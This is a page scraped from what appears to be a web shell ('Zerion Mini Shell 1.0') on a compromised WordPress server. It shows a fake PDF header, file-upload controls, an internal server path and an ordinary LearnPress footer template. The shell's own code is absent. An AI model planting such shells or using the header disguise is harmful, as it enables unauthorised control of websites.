%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/itworks/wp-content/plugins/learnpress/templates/single-course/content-item/
Upload File :
Create Path :
Current File : /var/www/html/itworks/wp-content/plugins/learnpress/templates/single-course/content-item/footer.php

<?php
/**
 * Template for displaying footer of single course popup.
 *
 * This template can be overridden by copying it to yourtheme/learnpress/single-course/footer.php.
 *
 * @author   ThimPress
 * @package  Learnpress/Templates
 * @version  3.0.0
 */

/**
 * Prevent loading this file directly
 */
defined( 'ABSPATH' ) || exit();

$course = LP_Global::course();
$user   = LP_Global::user();
?>

<div id="course-item-content-footer">

	<?php if ( $user->can_finish_course( $course->get_id() ) ) { ?>

		<?php learn_press_get_template( 'single-course/buttons/finish.php' ); ?>

	<?php } ?>

</div>

Zerion Mini Shell 1.0